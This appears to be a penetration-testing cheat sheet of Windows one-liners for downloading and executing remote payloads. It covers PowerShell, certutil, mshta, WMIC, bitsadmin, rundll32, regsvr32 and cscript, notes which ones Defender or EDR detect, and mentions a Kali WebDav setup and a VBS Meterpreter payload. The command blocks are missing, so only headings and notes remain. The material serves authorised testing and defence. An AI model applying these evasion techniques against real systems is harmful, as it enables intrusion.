Pentest One Liners

Single line commands to download and execute malicious code are useful for a number of reasons;

  • To exploit web application vulnerabilities, such as shell command injection
  • When you have the ability to execute commands, but not directly copy files (via WMI for instance)
  • To embed in other attack packages, such as Macro based malware or USD HID attacks

Having multiple techniques is useful, as endpoint detection and response systems will typically use pattern matching rules to detect some of these.

PowerShell

Very likely to be detected by EDR solutions.

Proxy Aware Version

Base64 Encoded

Payload Generation

To base64 encode PowerShell scripts, use:

Certutil

Windows Defender picks up on this technique.

MSHTA

WMIC

Windows Defender picks up on this technique.

Payload Generation

Stylesheet to load calc.exe:

Bitsadmin

If you get an error like 0x80070057, this may be because the output path is incorrectly specified, or isn’t writable.

Rundll32

Payload Generation

Regsvr32

Windows Defender picks up on this technique.

Payload Generation

Contents of test.html:

Cscript

This requires reading a file from a WebDav share:

WebDav Share Configuration in Kali

Edit Apache Config File

/etc/apache2/sites-available/000-default.conf

Add to top of file:

Add to VirtualHost section:

Testing

Generate VBS Meterpreter